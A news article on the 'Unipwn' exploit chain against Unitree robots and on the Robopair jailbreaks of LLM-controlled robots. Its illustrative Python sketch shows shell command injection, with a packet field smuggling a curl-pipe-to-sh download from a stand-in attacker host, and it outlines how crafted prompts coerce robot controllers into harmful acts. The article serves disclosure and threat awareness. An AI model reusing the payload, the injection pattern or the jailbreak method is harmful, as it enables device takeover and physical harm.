- Unipwn targets Unitree robots, enabling remote root access via network services
- Vulnerability combines hardcoded keys, weak handshakes and unsafe command execution
- Compromised devices could attempt lateral movement through nearby robots over wireless links
Security researchers BIN4RY and D0TSLASH published research on GitHub detailing an exploit called “Unipwn” that affects several Unitree product lines.
The vulnerability affects the G1 humanoid and the GO2 and B2 quadrupeds, and it can be used to escalate privileges to root.
It appears to chain together weaknesses that, when combined, allow remote command injection on affected devices.
How the Vulnerability Works and Why It Matters
The vulnerability chain reportedly includes hard-coded cryptographic keys, a handshake that only checks for the literal string “Unitree”, and unsanitized user data that gets concatenated into shell commands the system then executes.
These elements combine into an unusually simple path from a network packet to arbitrary code execution.
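To make that pattern concrete, here is a minimal, hypothetical sketch of the kind of flaw described: a handshake that only checks a fixed, publicly known string, plus attacker-controlled data pasted into a shell command. The service name, packet fields, and commands below are invented for illustration; this is not Unitree's actual code.

```python
# Hypothetical illustration of the vulnerable pattern described above.
# Field names and commands are invented; this is NOT Unitree's code.
import subprocess

def handle_setup_packet(packet: dict) -> None:
    # Weak "handshake": accepting any packet containing a fixed,
    # publicly known marker string provides no real authentication.
    if packet.get("vendor") != "Unitree":
        return

    # Unsanitized injection point: attacker-controlled data is
    # concatenated straight into a shell command line.
    ssid = packet.get("ssid", "")
    cmd = f"wifi_config --ssid '{ssid}'"   # vulnerable concatenation
    subprocess.run(cmd, shell=True)        # shell=True runs whatever was injected

# A nearby attacker could then send a packet whose field breaks out of
# the quoting and appends its own command:
malicious_packet = {
    "vendor": "Unitree",
    "ssid": "home'; curl http://attacker.example/implant.sh | sh #",
}
# handle_setup_packet(malicious_packet)  -> arbitrary command execution as root
```

Because the service reportedly runs with root privileges, any command injected this way would execute with full control of the device.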
Researchers say the exploit leverages the robots’ Bluetooth Low Energy and Wi-Fi setup service.
Because this exposed service accepts wireless connections, a compromised unit can receive commands over wireless links and attempt to influence other devices within radio range.
That changes the threat model from a single compromised device to potential lateral movement through neighboring units.
Researchers describe parts of the Unipwn chain as “wormable,” meaning that a successful exploit can persist on a device and attempt to propagate automatically to other accessible devices, which raises the risk considerably.
Still, the wormable behavior observed in tests does not guarantee rapid real-world spread.
Real-world propagation depends on device configuration, network segmentation, firmware diversity, physical proximity, vendor patching pace, and operator practices.
Controlled laboratory tests may show capability, but field propagation will be shaped by these operational factors.
Thus, a first robot-to-robot viral outbreak remains unlikely, although manufacturers and operators would be unwise to treat this as a remote, theoretical threat.
Independent research into LLM jailbreaks against robots adds urgency to these technical findings.
A project known as Robopair demonstrated that carefully crafted prompts can coerce robot controllers, including the GO2 unit, into performing harmful actions.
Reported scenarios include converting robots into covert surveillance platforms and guiding them to plant explosives.
The Robopair team reported high success rates when it had access to the target robot’s API and formatted its prompts as code the API would execute.
Combining LLM jailbreak techniques with low-level remote command injection expands the attack surface.
Indeed, a single compromise could both defeat a model’s safety guardrails and execute arbitrary system commands.
Therefore, this disclosure should prompt immediate mitigation efforts, clearer vendor communication, and realistic threat modeling to avoid avoidable harm.
The nature of this defect is technically notable, and if weaponized, the consequences could be serious.
Via Tom's Hardware